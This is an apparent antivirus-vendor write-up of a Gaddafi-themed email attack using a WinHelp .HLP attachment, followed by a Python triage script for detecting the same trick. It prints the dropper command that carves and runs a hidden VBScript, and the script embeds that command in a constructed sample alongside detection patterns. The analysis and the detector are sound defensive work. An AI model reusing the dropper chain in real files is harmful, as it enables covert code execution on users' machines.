Beware - Gaddafi malware on Internet

As is not unusual when big news breaks, malware authors try to take advantage of the situation. This time, semi-targeted malware emails have been found in the wake of the news of Gadhafi’s death.
The email below was sent to a mailing list that receives information pertaining to the Uighur people. The mail appears to have been sent from Korea.

It reads:
The attachment is something of a dinosaur. It is a *.HLP file. The HLP file format was used by WinHelp in earlier Windows versions up to and including Windows XP, and would typically contain helpful information about the usage of applications. However, it also supported a macro language, which could do a lot of things – including executing files through the EF() macro.

The rest is obfuscated JavaScript that is fed to MSHTA.EXE. This JavaScript hands execution over to a VBScript:
new ActiveXObject('WSCRIPT.SHELL').RUN('CMD /C FOR /F "USEBACKQDELIMS=" %I IN (`DIR/B *.HLP`)DO FINDSTR /B INT3 "%I">C:/A.VBS&C:/A.VBS',0);close()
This script unpacks the main payload, a UPX-packed executable 22016 bytes long (MD5: 5d46db1a440467555cd6f7505d5ace65).
This is a backdoor trojan that exchanges encoded status information with an IP in China. We will be detecting this as W32/Backtsa, from the text string this trojan uses to register itself in the registry with:
%currentuser%\software\backtsaleht [stubpath]
This quite simple setup is rather common for attacks that are targeted, but not against really high-value targets.
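The hallmarks described above (the EF() macro, a script handed to MSHTA, the FOR/FINDSTR loop carving "INT3"-prefixed lines into a .VBS, a UPX-packed payload and the backtsaleht registry marker) lend themselves to a simple triage heuristic. The following is an added example, not code from the original post or from Norman; the sample bytes are constructed to mimic the layout described, since the real VBScript is not reproduced on the page.

```python
import re

# Constructed sample, not the real attachment: it only mimics the layout the post
# describes (an EF() macro handing a script to MSHTA, "INT3"-prefixed VBScript
# lines, an embedded UPX-packed PE) so the heuristics have something to hit.
SAMPLE_HLP = (
    b"?_ Help file header (constructed)\r\n"
    b"EF(\"mshta.exe\", \"javascript:new ActiveXObject('WSCRIPT.SHELL').RUN('CMD /C "
    b"FOR /F \"USEBACKQ DELIMS=\" %I IN (`DIR/B *.HLP`) DO FINDSTR /B INT3 \"%I\""
    b">C:/A.VBS&C:/A.VBS',0);close()\")\r\n"
    b"INT3 = 0: Set fso = CreateObject(\"Scripting.FileSystemObject\")\r\n"
    b"INT3 = 1: ' constructed placeholder for the dropper logic\r\n"
    b"INT3 = 2: key = \"software\\backtsaleht\"\r\n"
    b"MZ\x90\x00" + b"\x00" * 60 + b"UPX!" + b"\x00" * 16
)
BENIGN_HLP = b"?_ Help file header\r\nSome ordinary help text.\r\n"

# Patterns lifted from the post's description of the chain (matched case-insensitively).
INDICATORS = [
    (rb"\bEF\(", "WinHelp EF() macro (executes a file)"),
    (rb"\bMSHTA\b", "script handed to MSHTA.EXE"),
    (rb"WSCRIPT\.SHELL", "WScript.Shell RUN from script"),
    (rb"FINDSTR\s+/B", "FINDSTR line-carving into a .VBS"),
    (rb"BACKTSALEHT", "W32/Backtsa registry marker"),
]


def findstr_b(data: bytes, prefix: bytes) -> list:
    """Mimic `FINDSTR /B prefix file`: return the lines that begin with prefix."""
    return [line for line in data.splitlines() if line.startswith(prefix)]


def triage_hlp(data: bytes) -> dict:
    """Return the heuristics a sample trips; an empty dict means nothing matched."""
    findings = {}
    for pattern, label in INDICATORS:
        if re.search(pattern, data, re.IGNORECASE):
            findings[label] = True
    carved = findstr_b(data, b"INT3")  # what the FOR/FINDSTR loop would write to A.VBS
    if carved:
        findings["INT3-prefixed script lines"] = len(carved)
    if b"UPX!" in data and data.find(b"MZ") != -1:
        findings["embedded UPX-packed PE"] = True
    return findings


if __name__ == "__main__":
    for name, blob in (("sample", SAMPLE_HLP), ("benign", BENIGN_HLP)):
        print(name, triage_hlp(blob))
```

The check is deliberately string-based: it flags the carving trick regardless of how the JavaScript itself is obfuscated, which is the part of the chain that varies between samples.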
